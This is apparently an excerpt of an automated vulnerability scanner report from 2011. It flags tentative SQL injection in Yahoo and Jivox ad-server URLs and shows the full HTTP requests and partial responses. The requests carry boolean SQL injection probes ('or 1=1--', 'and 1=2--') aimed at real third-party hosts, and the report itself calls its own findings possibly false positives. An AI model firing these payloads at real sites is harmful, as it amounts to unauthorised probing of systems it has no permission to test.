GET /player/iabplayer.php?siteId=24bbcd13d37379'%20and%201%3d2--%20&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:07:42 GMT
Expires: Mon, 4 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 1956
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Jivox Ad Preview
...[SNIP]...
jk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%252F2%252F%252Ahttp%253A%252F%252Fwww.quatros.com%26mouseAction%3DmouseOver%26serverURL%3Dhttp%3A%2F%2Fas.jivox.com%26reportingURL%3Dhttp%253A%252F%252Fevs.jivox.com%26adThumbnail%3Dhttp%3A%2F%2Fjivoxuploads.s3.amazonaws.com%2F15976%2F11955-vid-1284509745-4c901031d728a-b.jpg%26adVideoURL%3D' type='text/javascript'%3E%3C/script%3E"));
   </script>
   <noscript>
    <a href="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com" target="_blank">
    <img src="http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg" height="250" width="300" border="0" />
    </a>
   </noscript>
</body>
</html>


1.2. http://l.yimg.com/j/assets/eJx1UtluwyAQ_KLEHAZs9WMQxpsYxWYtINffF4PTJpX6BMzMHrOLjbF5Xl0TIEI6nNCneDgHN0bNjvRIjoG2nDH6ZbPO4rKgbwYTIeNCCaEKHlcMKW5QL4QsEDxWqNhv-DqbJwQdwQQ7ZUbxlvU1gcUAaXL-Q29CcnbeSinGePfeQkKcBxMyJQXl_J3aDvB_St_cCFgSvdR7Mx4TlM4V4W0hnEW_IZLKPfinu5dzxWQvKlW8aBOji6lZnHf1qhkhPekYoZJ3W3opKSsRJzDpGmDUw4znUidzH95GF-2MMYu2wJZ2dUarsxdYNIwuYdDbq0SrVu0zdAnu2ab25qYnMGN2d8JsL9RR7_b2Is-4HhYcX2eRMMn-kwz4KFPYdfva0Toz6-GaUh2Z6GRL_0thJ7CXsmEpGalLuKMpH4H0nH4DlFncJQ,,.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://l.yimg.com
Path:   /j/assets/eJx1UtluwyAQ_KLEHAZs9WMQxpsYxWYtINffF4PTJpX6BMzMHrOLjbF5Xl0TIEI6nNCneDgHN0bNjvRIjoG2nDH6ZbPO4rKgbwYTIeNCCaEKHlcMKW5QL4QsEDxWqNhv-DqbJwQdwQQ7ZUbxlvU1gcUAaXL-Q29CcnbeSinGePfeQkKcBxMyJQXl_J3aDvB_St_cCFgSvdR7Mx4TlM4V4W0hnEW_IZLKPfinu5dzxWQvKlW8aBOji6lZnHf1qhkhPekYoZJ3W3opKSsRJzDpGmDUw4znUidzH95GF-2MMYu2wJZ2dUarsxdYNIwuYdDbq0SrVu0zdAnu2ab25qYnMGN2d8JsL9RR7_b2Is-4HhYcX2eRMMn-kwz4KFPYdfva0Toz6-GaUh2Z6GRL_0thJ7CXsmEpGalLuKMpH4H0nH4DlFncJQ,,.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 41506506'%20or%201%3d1--%20 and 41506506'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /j/assets41506506'%20or%201%3d1--%20/eJx1UtluwyAQ_KLEHAZs9WMQxpsYxWYtINffF4PTJpX6BMzMHrOLjbF5Xl0TIEI6nNCneDgHN0bNjvRIjoG2nDH6ZbPO4rKgbwYTIeNCCaEKHlcMKW5QL4QsEDxWqNhv-DqbJwQdwQQ7ZUbxlvU1gcUAaXL-Q29CcnbeSinGePfeQkKcBxMyJQXl_J3aDvB_St_cCFgSvdR7Mx4TlM4V4W0hnEW_IZLKPfinu5dzxWQvKlW8aBOji6lZnHf1qhkhPekYoZJ3W3opKSsRJzDpGmDUw4znUidzH95GF-2MMYu2wJZ2dUarsxdYNIwuYdDbq0SrVu0zdAnu2ab25qYnMGN2d8JsL9RR7_b2Is-4HhYcX2eRMMn-kwz4KFPYdfva0Toz6-GaUh2Z6GRL_0thJ7CXsmEpGalLuKMpH4H0nH4DlFncJQ,,.css?z&m HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:05:26 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.19.5
Content-Length: 3807


<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo!</title><style>
<script type="text/javascript">
document.location = 'http://searc
...[SNIP]...
1311&url=Yahoo!+Sports+assets41506506+39+or+1+ejx1utluwyaq+klehazs9wmqxpsyxwytinfff4ptjpx6bmzmhroljbf5xl0tiei6nncnedghn0bnjvrijog2ndh6zbpo4rkgbwytienccaekhlcmkw5ql4qsedxwqnhv+dqbjwqdwqq7zubxlvu1gcuaaxl+q29ccnbesingepfeqkkcbxmyjqxl'
</script>/* nn4 hide */
/*/*/
body {font:small/1.2em arial,helvetica,clean,sans-serif;font:x-small;text-align:center;}table {font-size:inherit;font:x-small;}
html>body {font:83%/1.2em arial,helvetica,clean,sans-serif;}input {font-size:100%;vertical-align:middle;}p, form {margin:0;padding:0;}
p {padding-bottom:6px;margin-bottom:10px;}#doc {width:48.5em;margin:0 auto;border:1px solid #fff;text-align:center;}#ygma {text-align:right;margin-bottom:53px}
#ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;padding-bottom:8px;margin-left:152px;}#bd {clear:both;text-align:left;width:75%;margin:0 auto 20px;}
h1 {font-size:135%;text-align:center;margin:0 0 15px;}legend {display:none;}fieldset {border:0 solid #fff;padding:.8em 0 .8em 4.5em;}
form {position:relative;background:#eee;margin-bottom:15px;border:1px solid #ccc;border-width:1px 0;}
#s1p {width:15em;margin-right:.1em;}
form span {position:absolute;left:70%;top:.8em;}form a {font:78%/1.2em arial;display:block;padding-left:.8em;white-space:nowrap;background: url(http://l.yimg.com/a/i/s/bullet.gif) no-repeat left center;}
form .sep {display:none;}.more {text-align:center;}#ft {padding-top:10px;border-top:1px solid #999;}#ft p {text-align:center;font:78% arial;}
/* end nn4 hide */
</style></head>
<body><div id="doc">
<div id="ygma"><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com"><img src=http://l.yimg.com/a/i/yahoo.gif width=147 height=31 border=0 alt="Yahoo!"></a><div><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo!</a> - <a href="http://us.rd.yahoo.com/default/*http://help.yahoo.com">Help</a></div></div>
<div id="bd"><h1>Sorry, the page you requested was not found.</h1>
<p>Please check the URL for proper spelling and capitalization. If you're having trouble locating a destination on Yahoo!, try visiting the <strong><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo! home page</a></strong> or look through a list of <strong><a
...[SNIP]...

Request 2

GET /j/assets41506506'%20or%201%3d2--%20/eJx1UtluwyAQ_KLEHAZs9WMQxpsYxWYtINffF4PTJpX6BMzMHrOLjbF5Xl0TIEI6nNCneDgHN0bNjvRIjoG2nDH6ZbPO4rKgbwYTIeNCCaEKHlcMKW5QL4QsEDxWqNhv-DqbJwQdwQQ7ZUbxlvU1gcUAaXL-Q29CcnbeSinGePfeQkKcBxMyJQXl_J3aDvB_St_cCFgSvdR7Mx4TlM4V4W0hnEW_IZLKPfinu5dzxWQvKlW8aBOji6lZnHf1qhkhPekYoZJ3W3opKSsRJzDpGmDUw4znUidzH95GF-2MMYu2wJZ2dUarsxdYNIwuYdDbq0SrVu0zdAnu2ab25qYnMGN2d8JsL9RR7_b2Is-4HhYcX2eRMMn-kwz4KFPYdfva0Toz6-GaUh2Z6GRL_0thJ7CXsmEpGalLuKMpH4H0nH4DlFncJQ,,.css?z&m HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:05:26 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.19.5
Content-Length: 3780


<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo!</title><style>
<script type="text/javascript">
document.location = 'http://searc
...[SNIP]...
ericks_win_nba_finals_061311&url=Yahoo!+Sports+assets41506506+39+or+1+2+ejx1utluwyaq+klehazs9wmqxpsyxwytinfff4ptjpx6bmzmhroljbf5xl0tiei6nncnedghn0bnjvrijog2ndh6zbpo4rkgbwytienccaekhlcmkw5ql4qsedxwqnhv+dqbjwqdwqq7zubxlvu1gcuaaxl'
</script>/* nn4 hide */
/*/*/
body {font:small/1.2em arial,helvetica,clean,sans-serif;font:x-small;text-align:center;}table {font-size:inherit;font:x-small;}
html>body {font:83%/1.2em arial,helvetica,clean,sans-serif;}input {font-size:100%;vertical-align:middle;}p, form {margin:0;padding:0;}
p {padding-bottom:6px;margin-bottom:10px;}#doc {width:48.5em;margin:0 auto;border:1px solid #fff;text-align:center;}#ygma {text-align:right;margin-bottom:53px}
#ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;padding-bottom:8px;margin-left:152px;}#bd {clear:both;text-align:left;width:75%;margin:0 auto 20px;}
h1 {font-size:135%;text-align:center;margin:0 0 15px;}legend {display:none;}fieldset {border:0 solid #fff;padding:.8em 0 .8em 4.5em;}
form {position:relative;background:#eee;margin-bottom:15px;border:1px solid #ccc;border-width:1px 0;}
#s1p {width:15em;margin-right:.1em;}
form span {position:absolute;left:70%;top:.8em;}form a {font:78%/1.2em arial;display:block;padding-left:.8em;white-space:nowrap;background: url(http://l.yimg.com/a/i/s/bullet.gif) no-repeat left center;}
form .sep {display:none;}.more {text-align:center;}#ft {padding-top:10px;border-top:1px solid #999;}#ft p {text-align:center;font:78% arial;}
/* end nn4 hide */
</style></head>
<body><div id="doc">
<div id="ygma"><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com"><img src=http://l.yimg.com/a/i/yahoo.gif width=147 height=31 border=0 alt="Yahoo!"></a><div><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo!</a> - <a href="http://us.rd.yahoo.com/default/*http://help.yahoo.com">Help</a></div></div>
<div id="bd"><h1>Sorry, the page you requested was not found.</h1>
<p>Please check the URL for proper spelling and capitalization. If you're having trouble locating a destination on Yahoo!, try visiting the <strong><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo! home page</a></strong> or look through a list of <strong><a hr
...[SNIP]...

1.3. http://l.yimg.com/j/assets/eJx9UtuOgyAU_CJvXFSyH2NOkba0yDGA27hfv4BNVpO6T-LMnGEYePhqXXRFyq6s08ogjMoVk7alaxglpPl67CUjTuek-lY2nNMSrVUyaLTnGrB6gv8lD_-ZpSXdzvAmeddTnkivwMn7AN5rH6pI6m05kLoWdU_qpqX93i0G9QFs8BFsWdRklxldRhjnffYNcPHHMXxqlZCu5ywh4IKWJkOiafLQS9sRX_sxL9GpcD8eaAILN-UO9uBw8crsscWE_e9sYFVu2A58jDZNaKvVz8WEY_5uWotBFX-bccJFHhi1lwb94lL4tunY1gFKDWa4LCHEihLTv9txMOsxG3SMf0j2IcAVpLrEyqKsqymjJzJ5V_KZy2k5ZeJEpZUoZm2L4CCpb9k0XtSJ3MDPuj31JCRCZOHVrLik2F2Mc7bT7hriC9vaeiGkurkgov0FgL4UpA,,.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://l.yimg.com
Path:   /j/assets/eJx9UtuOgyAU_CJvXFSyH2NOkba0yDGA27hfv4BNVpO6T-LMnGEYePhqXXRFyq6s08ogjMoVk7alaxglpPl67CUjTuek-lY2nNMSrVUyaLTnGrB6gv8lD_-ZpSXdzvAmeddTnkivwMn7AN5rH6pI6m05kLoWdU_qpqX93i0G9QFs8BFsWdRklxldRhjnffYNcPHHMXxqlZCu5ywh4IKWJkOiafLQS9sRX_sxL9GpcD8eaAILN-UO9uBw8crsscWE_e9sYFVu2A58jDZNaKvVz8WEY_5uWotBFX-bccJFHhi1lwb94lL4tunY1gFKDWa4LCHEihLTv9txMOsxG3SMf0j2IcAVpLrEyqKsqymjJzJ5V_KZy2k5ZeJEpZUoZm2L4CCpb9k0XtSJ3MDPuj31JCRCZOHVrLik2F2Mc7bT7hriC9vaeiGkurkgov0FgL4UpA,,.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 19026485'%20or%201%3d1--%20 and 19026485'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /j/assets19026485'%20or%201%3d1--%20/eJx9UtuOgyAU_CJvXFSyH2NOkba0yDGA27hfv4BNVpO6T-LMnGEYePhqXXRFyq6s08ogjMoVk7alaxglpPl67CUjTuek-lY2nNMSrVUyaLTnGrB6gv8lD_-ZpSXdzvAmeddTnkivwMn7AN5rH6pI6m05kLoWdU_qpqX93i0G9QFs8BFsWdRklxldRhjnffYNcPHHMXxqlZCu5ywh4IKWJkOiafLQS9sRX_sxL9GpcD8eaAILN-UO9uBw8crsscWE_e9sYFVu2A58jDZNaKvVz8WEY_5uWotBFX-bccJFHhi1lwb94lL4tunY1gFKDWa4LCHEihLTv9txMOsxG3SMf0j2IcAVpLrEyqKsqymjJzJ5V_KZy2k5ZeJEpZUoZm2L4CCpb9k0XtSJ3MDPuj31JCRCZOHVrLik2F2Mc7bT7hriC9vaeiGkurkgov0FgL4UpA,,.js?z&m HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:06:23 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.19.5
Content-Length: 3740


<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo!</title><style>
<script type="text/javascript">
document.location = 'http://searc
...[SNIP]...
ws%3Fslug%3Daw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311&url=Yahoo!+Sports+assets19026485+39+or+1+ejx9utuogyau+cjvxfsyh2nokba0ydga27hfv4bnvpo6t+lmngeyephqxxrfyq6s08ogjmovk7alaxglppl67cujtuek+ly2nnmsrvuyaltngrb6gv8ld'
</script>/* nn4 hide */
/*/*/
body {font:small/1.2em arial,helvetica,clean,sans-serif;font:x-small;text-align:center;}table {font-size:inherit;font:x-small;}
html>body {font:83%/1.2em arial,helvetica,clean,sans-serif;}input {font-size:100%;vertical-align:middle;}p, form {margin:0;padding:0;}
p {padding-bottom:6px;margin-bottom:10px;}#doc {width:48.5em;margin:0 auto;border:1px solid #fff;text-align:center;}#ygma {text-align:right;margin-bottom:53px}
#ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;padding-bottom:8px;margin-left:152px;}#bd {clear:both;text-align:left;width:75%;margin:0 auto 20px;}
h1 {font-size:135%;text-align:center;margin:0 0 15px;}legend {display:none;}fieldset {border:0 solid #fff;padding:.8em 0 .8em 4.5em;}
form {position:relative;background:#eee;margin-bottom:15px;border:1px solid #ccc;border-width:1px 0;}
#s1p {width:15em;margin-right:.1em;}
form span {position:absolute;left:70%;top:.8em;}form a {font:78%/1.2em arial;display:block;padding-left:.8em;white-space:nowrap;background: url(http://l.yimg.com/a/i/s/bullet.gif) no-repeat left center;}
form .sep {display:none;}.more {text-align:center;}#ft {padding-top:10px;border-top:1px solid #999;}#ft p {text-align:center;font:78% arial;}
/* end nn4 hide */
</style></head>
<body><div id="doc">
<div id="ygma"><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com"><img src=http://l.yimg.com/a/i/yahoo.gif width=147 height=31 border=0 alt="Yahoo!"></a><div><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo!</a> - <a href="http://us.rd.yahoo.com/default/*http://help.yahoo.com">Help</a></div></div>
<div id="bd"><h1>Sorry, the page you requested was not found.</h1>
<p>Please check the URL for proper spelling and capitalization. If you're having trouble locating a destination on Yahoo!, try visiting the <strong><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo! home page</a></strong> or look through a list of <strong><a hre
...[SNIP]...

Request 2

GET /j/assets19026485'%20or%201%3d2--%20/eJx9UtuOgyAU_CJvXFSyH2NOkba0yDGA27hfv4BNVpO6T-LMnGEYePhqXXRFyq6s08ogjMoVk7alaxglpPl67CUjTuek-lY2nNMSrVUyaLTnGrB6gv8lD_-ZpSXdzvAmeddTnkivwMn7AN5rH6pI6m05kLoWdU_qpqX93i0G9QFs8BFsWdRklxldRhjnffYNcPHHMXxqlZCu5ywh4IKWJkOiafLQS9sRX_sxL9GpcD8eaAILN-UO9uBw8crsscWE_e9sYFVu2A58jDZNaKvVz8WEY_5uWotBFX-bccJFHhi1lwb94lL4tunY1gFKDWa4LCHEihLTv9txMOsxG3SMf0j2IcAVpLrEyqKsqymjJzJ5V_KZy2k5ZeJEpZUoZm2L4CCpb9k0XtSJ3MDPuj31JCRCZOHVrLik2F2Mc7bT7hriC9vaeiGkurkgov0FgL4UpA,,.js?z&m HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:06:23 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.19.5
Content-Length: 3717


<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo!</title><style>
<script type="text/javascript">
document.location = 'http://searc
...[SNIP]...
ref=http%3A%2F%2Fsports.yahoo.com%2Fnba%2Fnews%3Fslug%3Daw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311&url=Yahoo!+Sports+assets19026485+39+or+1+2+ejx9utuogyau+cjvxfsyh2nokba0ydga27hfv4bnvpo6t+lmngeyephqxxrfyq6s08ogjmovk7alaxglppl67cujtuek'
</script>/* nn4 hide */
/*/*/
body {font:small/1.2em arial,helvetica,clean,sans-serif;font:x-small;text-align:center;}table {font-size:inherit;font:x-small;}
html>body {font:83%/1.2em arial,helvetica,clean,sans-serif;}input {font-size:100%;vertical-align:middle;}p, form {margin:0;padding:0;}
p {padding-bottom:6px;margin-bottom:10px;}#doc {width:48.5em;margin:0 auto;border:1px solid #fff;text-align:center;}#ygma {text-align:right;margin-bottom:53px}
#ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;padding-bottom:8px;margin-left:152px;}#bd {clear:both;text-align:left;width:75%;margin:0 auto 20px;}
h1 {font-size:135%;text-align:center;margin:0 0 15px;}legend {display:none;}fieldset {border:0 solid #fff;padding:.8em 0 .8em 4.5em;}
form {position:relative;background:#eee;margin-bottom:15px;border:1px solid #ccc;border-width:1px 0;}
#s1p {width:15em;margin-right:.1em;}
form span {position:absolute;left:70%;top:.8em;}form a {font:78%/1.2em arial;display:block;padding-left:.8em;white-space:nowrap;background: url(http://l.yimg.com/a/i/s/bullet.gif) no-repeat left center;}
form .sep {display:none;}.more {text-align:center;}#ft {padding-top:10px;border-top:1px solid #999;}#ft p {text-align:center;font:78% arial;}
/* end nn4 hide */
</style></head>
<body><div id="doc">
<div id="ygma"><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com"><img src=http://l.yimg.com/a/i/yahoo.gif width=147 height=31 border=0 alt="Yahoo!"></a><div><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo!</a> - <a href="http://us.rd.yahoo.com/default/*http://help.yahoo.com">Help</a></div></div>
<div id="bd"><h1>Sorry, the page you requested was not found.</h1>
<p>Please check the URL for proper spelling and capitalization. If you're having trouble locating a destination on Yahoo!, try visiting the <strong><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo! home page</a></strong> or look through a l
...[SNIP]...

1.4. http://sports.yahoo.com/nba/news [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sports.yahoo.com
Path:   /nba/news

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /nba'%20and%201%3d1--%20/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311 HTTP/1.1
Host: sports.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:07:43 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Via: HTTP/1.1 r4.ycpi.a2s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5
Content-Length: 3530


<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo!</title><style>
<script type="text/javascript">
document.location = 'http://search.yahoo.com/404handler?src=sports&fr=404_sports&ref=&url=Yahoo!+Sports+nba+39+and+1+news+slug+aw+wojnarowski'
</script>/* nn4 hide */
/*/*/
body {font:small/1.2em arial,helvetica,clean,sans-serif;font:x-small;text-align:center;}table {font-size:inherit;font:x-small;}
html>body {font:83%/1.2em arial,helvetica,clean,sans-serif;}input {font-size:100%;vertical-align:middle;}p, form {margin:0;padding:0;}
p {padding-bottom:6px;margin-bottom:10px;}#doc {width:48.5em;margin:0 auto;border:1px solid #fff;text-align:center;}#ygma {text-align:right;margin-bottom:53px}
#ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;padding-bottom:8px;margin-left:152px;}#bd {clear:both;text-align:left;width:75%;margin:0 auto 20px;}
h1 {font-size:135%;text-align:center;margin:0 0 15px;}legend {display:none;}fieldset {border:0 solid #fff;padding:.8em 0 .8em 4.5em;}
form {position:relative;background:#eee;margin-bottom:15px;border:1px solid #ccc;border-width:1px 0;}
#s1p {width:15em;margin-right:.1em;}
form span {position:absolute;left:70%;top:.8em;}form a {font:78%/1.2em arial;display:block;padding-left:.8em;white-space:nowrap;background: url(http://l.yimg.com/a/i/s/bullet.gif) no-repeat left center;}
form .sep {display:none;}.more {text-align:center;}#ft {padding-top:10px;border-top:1px solid #999;}#ft p {text-align:center;font:78% arial;}
/* end nn4 hide */
</style></head>
<body><div id="doc">
<div id="ygma"><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com"><img src=http://l.yimg.com/a/i/yahoo.gif width=147 height=31 border=0 alt="Yahoo!"></a><div><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo!</a> - <a href="http://us.rd.yahoo.com/default/*http://help.yahoo.com">Help</a></div></div>
<div id="bd"><h1>Sorry, the page you requested was not found.</h1>
<p>Please check the URL for proper spelling and capitalization. If you're having trouble locating a destination on Yahoo!, try visiting the <strong><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo! home page</a></strong> or look through a list of <strong><a href="http://us.
